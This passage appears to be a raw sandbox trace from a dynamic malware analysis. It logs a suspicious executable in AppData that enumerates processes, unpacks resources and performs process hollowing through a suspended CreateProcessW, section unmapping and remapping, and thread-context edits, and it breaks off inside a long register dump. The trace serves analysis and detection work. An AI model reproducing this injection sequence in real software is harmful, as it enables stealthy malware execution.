dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0099.761] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.762] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0099.762] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0099.763] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.763] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0099.764] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.764] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe7c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0099.765] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe7c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 0 [0099.766] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f644, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0099.766] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1f, ProcessInformation=0x18f87c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f87c, ReturnLength=0x0) returned 0x0 [0099.766] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1e, ProcessInformation=0x18f878, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f878, ReturnLength=0x0) returned 0xc0000353 [0099.766] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\"" [0099.766] CallWindowProcW (lpPrevWndFunc=0x380004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x96be00 [0099.767] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\"", pNumArgs=0x18f87c | out: pNumArgs=0x18f87c) returned 0x96be00*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" [0099.767] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0099.767] FindResourceW (hModule=0x400000, lpName=0x14d, lpType=0x17) returned 0x47cac8 [0099.767] SizeofResource (hModule=0x400000, hResInfo=0x47cac8) returned 0x2ab [0099.767] LoadResource (hModule=0x400000, hResInfo=0x47cac8) returned 0x4ec298 [0099.767] VirtualAlloc (lpAddress=0x0, dwSize=0x2ab, flAllocationType=0x3000, flProtect=0x4) returned 0x390000 [0099.767] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\"" [0099.768] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x18edd8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0099.771] VirtualAlloc (lpAddress=0x0, dwSize=0xd4aac, flAllocationType=0x3000, flProtect=0x4) returned 0x20e0000 [0099.773] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0099.773] FindResourceW (hModule=0x400000, lpName=0x3e8, lpType=0x2) returned 0x47c8a8 [0099.773] SizeofResource (hModule=0x400000, hResInfo=0x47c8a8) returned 0x1a955 [0099.773] LoadResource (hModule=0x400000, hResInfo=0x47c8a8) returned 0x47e768 [0099.773] VirtualAlloc (lpAddress=0x0, dwSize=0x1a955, flAllocationType=0x3000, flProtect=0x4) returned 0x3b0000 [0099.777] VirtualFree (lpAddress=0x3b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.778] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0099.778] FindResourceW (hModule=0x400000, lpName=0x3e9, lpType=0x2) returned 0x47c8b8 [0099.778] SizeofResource (hModule=0x400000, hResInfo=0x47c8b8) returned 0x1a955 [0099.778] LoadResource (hModule=0x400000, hResInfo=0x47c8b8) returned 0x4990c0 [0099.778] VirtualAlloc (lpAddress=0x0, dwSize=0x1a955, flAllocationType=0x3000, flProtect=0x4) returned 0x3b0000 [0099.781] VirtualFree (lpAddress=0x3b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.782] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0099.782] FindResourceW (hModule=0x400000, lpName=0x3ea, lpType=0x2) returned 0x47c8c8 [0099.782] SizeofResource (hModule=0x400000, hResInfo=0x47c8c8) returned 0x1a955 [0099.782] LoadResource (hModule=0x400000, hResInfo=0x47c8c8) returned 0x4b3a18 [0099.782] VirtualAlloc (lpAddress=0x0, dwSize=0x1a955, flAllocationType=0x3000, flProtect=0x4) returned 0x3b0000 [0099.786] VirtualFree (lpAddress=0x3b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.787] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0099.787] FindResourceW (hModule=0x400000, lpName=0x3eb, lpType=0x2) returned 0x47c8d8 [0099.787] SizeofResource (hModule=0x400000, hResInfo=0x47c8d8) returned 0x1a955 [0099.787] LoadResource (hModule=0x400000, hResInfo=0x47c8d8) returned 0x4ce370 [0099.787] VirtualAlloc (lpAddress=0x0, dwSize=0x1a955, flAllocationType=0x3000, flProtect=0x4) returned 0x3b0000 [0099.791] VirtualFree (lpAddress=0x3b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.791] VirtualAlloc (lpAddress=0x0, dwSize=0x60a00, flAllocationType=0x3000, flProtect=0x4) returned 0x1f30000 [0099.799] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\"" [0099.799] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x4) returned 0x3b0000 [0099.800] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f800*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f854 | out: lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\"", lpProcessInformation=0x18f854*(hProcess=0xec, hThread=0xf4, dwProcessId=0xebc, dwThreadId=0xec0)) returned 1 [0099.805] NtUnmapViewOfSection (ProcessHandle=0xec, BaseAddress=0x400000) returned 0x0 [0099.805] NtCreateSection (in: SectionHandle=0x18f864, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x18f5d0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18f864*=0xfc) returned 0x0 [0099.805] NtMapViewOfSection (in: SectionHandle=0xfc, ProcessHandle=0xffffffff, BaseAddress=0x18f868*=0x0, ZeroBits=0x0, CommitSize=0x142000, SectionOffset=0x0, ViewSize=0x18f5d0*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x18f868*=0x3220000, SectionOffset=0x0, ViewSize=0x18f5d0*=0x142000) returned 0x0 [0099.811] NtMapViewOfSection (in: SectionHandle=0xfc, ProcessHandle=0xec, BaseAddress=0x18f850*=0x400000, ZeroBits=0x0, CommitSize=0x142000, SectionOffset=0x0, ViewSize=0x18f5d0*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x18f850*=0x400000, SectionOffset=0x0, ViewSize=0x18f5d0*=0x142000) returned 0x0 [0099.829] GetThreadContext (in: hThread=0xf4, lpContext=0x3b0000 | out: lpContext=0x3b0000*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x46c70c, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0099.830] SetThreadContext (hThread=0xf4, lpContext=0x3b0000*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x540c00, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, 